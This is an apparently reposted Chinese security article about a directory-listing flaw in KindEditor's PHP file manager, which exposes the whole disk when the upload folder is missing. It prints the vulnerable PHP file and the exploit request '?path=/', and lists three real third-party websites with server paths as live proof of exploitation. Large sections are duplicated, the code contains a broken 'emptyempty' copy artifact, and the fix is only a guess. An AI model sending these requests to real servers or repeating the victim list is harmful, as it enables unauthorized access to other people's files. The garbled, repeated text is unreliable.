Kindeditor特定情況可能會(huì)導(dǎo)致全盤瀏覽的漏洞
發(fā)布時(shí)間:2015-08-13 17:29:09 作者:佚名
我要評論

因?yàn)槔雍苌?,開始想了下不是他們的漏洞,后面想了下,后面沒有檢查好用戶的正常配置內(nèi)容導(dǎo)致,還是提下吧
因?yàn)槔雍苌伲_始想了下不是他們的漏洞,后面想了下,后面沒有檢查好用戶的正常配置內(nèi)容導(dǎo)致,還是提下吧。
下載地址:
貌似是最新版本的。
測試語言:PHP
測試漏洞文件:/kindeditor/php/file_manager_json.php
默認(rèn)配置(第16行):
$root_path = $php_path . '../attached/';
當(dāng)/attached/文件夾不存在(被刪)或者被改名為一個(gè)不存在的目錄時(shí),如網(wǎng)上的一個(gè)例子:
$root_path = $php_path . '../../../upload/';
這個(gè)CMS下面的目錄根本就沒得這個(gè)目錄,所以就造成了漏洞。
怎么造成了漏洞的呢?我們分析下。
第三十八行:
$current_path = realpath($root_path) . '/';
當(dāng)$root_path被realpath以后,不存在的目錄會(huì)返回空,然后連接后面的'/'
$current_path所以默認(rèn)就等于'/'
當(dāng)提交了$_GET['path']以后,而且$_GET['path']要以'/'為結(jié)尾(有驗(yàn)證),所以,我們就可以構(gòu)造瀏覽全盤目錄了。
kingedit/php/file_manager_json.php?path=/ (瀏覽盤符的根目錄)
接著上面給出驗(yàn)證的(互聯(lián)網(wǎng)找到幾個(gè)):
先給本地的(attached文件夾被我刪了):


互聯(lián)網(wǎng)找到的:
http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/

http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/
下載地址:
貌似是最新版本的。
測試語言:PHP
測試漏洞文件:/kindeditor/php/file_manager_json.php
默認(rèn)配置(第16行):
$root_path = $php_path . '../attached/';
當(dāng)/attached/文件夾不存在(被刪)或者被改名為一個(gè)不存在的目錄時(shí),如網(wǎng)上的一個(gè)例子:
$root_path = $php_path . '../../../upload/';
這個(gè)CMS下面的目錄根本就沒得這個(gè)目錄,所以就造成了漏洞。
怎么造成了漏洞的呢?我們分析下。
PHP Code復(fù)制內(nèi)容到剪貼板
- <?php
- /**
- * KindEditor PHP
- *
- * 本PHP程序是演示程序,建議不要直接在實(shí)際項(xiàng)目中使用。
- * 如果您確定直接使用本程序,使用之前請仔細(xì)確認(rèn)相關(guān)安全設(shè)置。
- *
- */
- require_once 'JSON.php';
- $php_path = dirname(__FILE__) . '/';
- $php_url = dirname($_SERVER['PHP_SELF']) . '/';
- //根目錄路徑,可以指定絕對路徑,比如 /var/www/attached/
- $root_path = $php_path . '../../../upload/';
- //根目錄URL,可以指定絕對路徑,比如 http://www.yoursite.com/attached/
- $root_url = $php_url . '../../../upload/';
- //圖片擴(kuò)展名
- $ext_arr = array('gif', 'jpg', 'jpeg', 'png', 'bmp');
- //目錄名
- $dir_name = emptyempty($_GET['dir']) ? '' : trim($_GET['dir']);
- if (!in_array($dir_name, array('', 'image', 'flash', 'media', 'file'))) {
- echo "Invalid Directory name.";
- exit;
- }
- if ($dir_name !== '') {
- $root_path .= $dir_name . "/";
- $root_url .= $dir_name . "/";
- if (!file_exists($root_path)) {
- mkdir($root_path);
- }
- }
- //根據(jù)path參數(shù),設(shè)置各路徑和URL
- if (emptyempty($_GET['path'])) {
- $current_path = realpath($root_path) . '/';
- $current_url = $root_url;
- $current_dir_path = '';
- $moveup_dir_path = '';
- } else {
- $current_path = realpath($root_path) . '/' . $_GET['path'];
- $current_url = $root_url . $_GET['path'];
- $current_dir_path = $_GET['path'];
- $moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/', '$1', $current_dir_path);
- }
- //echo realpath($root_path);
- //排序形式,name or size or type
- $order = emptyempty($_GET['order']) ? 'name' : strtolower($_GET['order']);
- //不允許使用..移動(dòng)到上一級目錄
- if (preg_match('/\.\./', $current_path)) {
- echo 'Access is not allowed.';
- exit;
- }
- //最后一個(gè)字符不是/
- if (!preg_match('/\/$/', $current_path)) {
- echo 'Parameter is not valid.';
- exit;
- }
- //目錄不存在或不是目錄
- if (!file_exists($current_path) || !is_dir($current_path)) {
- echo 'Directory does not exist.';
- exit;
- }
- //遍歷目錄取得文件信息
- $file_list = array();
- if ($handle = opendir($current_path)) {
- $i = 0;
- while (false !== ($filename = readdir($handle))) {
- if ($filename{0} == '.') continue;
- $file = $current_path . $filename;
- if (is_dir($file)) {
- $file_list[$i]['is_dir'] = true; //是否文件夾
- $file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夾是否包含文件
- $file_list[$i]['filesize'] = 0; //文件大小
- $file_list[$i]['is_photo'] = false; //是否圖片
- $file_list[$i]['filetype'] = ''; //文件類別,用擴(kuò)展名判斷
- } else {
- $file_list[$i]['is_dir'] = false;
- $file_list[$i]['has_file'] = false;
- $file_list[$i]['filesize'] = filesize($file);
- $file_list[$i]['dir_path'] = '';
- $file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
- $file_list[$i]['is_photo'] = in_array($file_ext, $ext_arr);
- $file_list[$i]['filetype'] = $file_ext;
- }
- $file_list[$i]['filename'] = $filename; //文件名,包含擴(kuò)展名
- $file_list[$i]['datetime'] = date('Y-m-d H:i:s', filemtime($file)); //文件最后修改時(shí)間
- $i++;
- }
- closedir($handle);
- }
- //排序
- function cmp_func($a, $b) {
- global $order;
- if ($a['is_dir'] && !$b['is_dir']) {
- return -1;
- } else if (!$a['is_dir'] && $b['is_dir']) {
- return 1;
- } else {
- if ($order == 'size') {
- if ($a['filesize'] > $b['filesize']) {
- return 1;
- } else if ($a['filesize'] < $b['filesize']) {
- return -1;
- } else {
- return 0;
- }
- } else if ($order == 'type') {
- return strcmp($a['filetype'], $b['filetype']);
- } else {
- return strcmp($a['filename'], $b['filename']);
- }
- }
- }
- usort($file_list, 'cmp_func');
- $result = array();
- //相對于根目錄的上一級目錄
- $result['moveup_dir_path'] = $moveup_dir_path;
- //相對于根目錄的當(dāng)前目錄
- $result['current_dir_path'] = $current_dir_path;
- //當(dāng)前目錄的URL
- $result['current_url'] = $current_url;
- //文件數(shù)
- $result['total_count'] = count($file_list);
- //文件列表數(shù)組
- $result['file_list'] = $file_list;
- //輸出JSON字符串
- header('Content-type: application/json; charset=UTF-8');
- $json = new Services_JSON();
- echo $json->encode($result);
第三十八行:
$current_path = realpath($root_path) . '/';
當(dāng)$root_path被realpath以后,不存在的目錄會(huì)返回空,然后連接后面的'/'
$current_path所以默認(rèn)就等于'/'
當(dāng)提交了$_GET['path']以后,而且$_GET['path']要以'/'為結(jié)尾(有驗(yàn)證),所以,我們就可以構(gòu)造瀏覽全盤目錄了。
kingedit/php/file_manager_json.php?path=/ (瀏覽盤符的根目錄)
接著上面給出驗(yàn)證的(互聯(lián)網(wǎng)找到幾個(gè)):
先給本地的(attached文件夾被我刪了):


互聯(lián)網(wǎng)找到的:
http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/

http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

修復(fù)方案:再驗(yàn)證下絕對路徑?
相關(guān)文章
- KindEditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網(wǎng)站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器2015-08-13
KindEditor上傳解析漏洞、列目錄、內(nèi)容漏洞
KindEditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網(wǎng)站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器,但是安全問題也不容忽視2014-07-31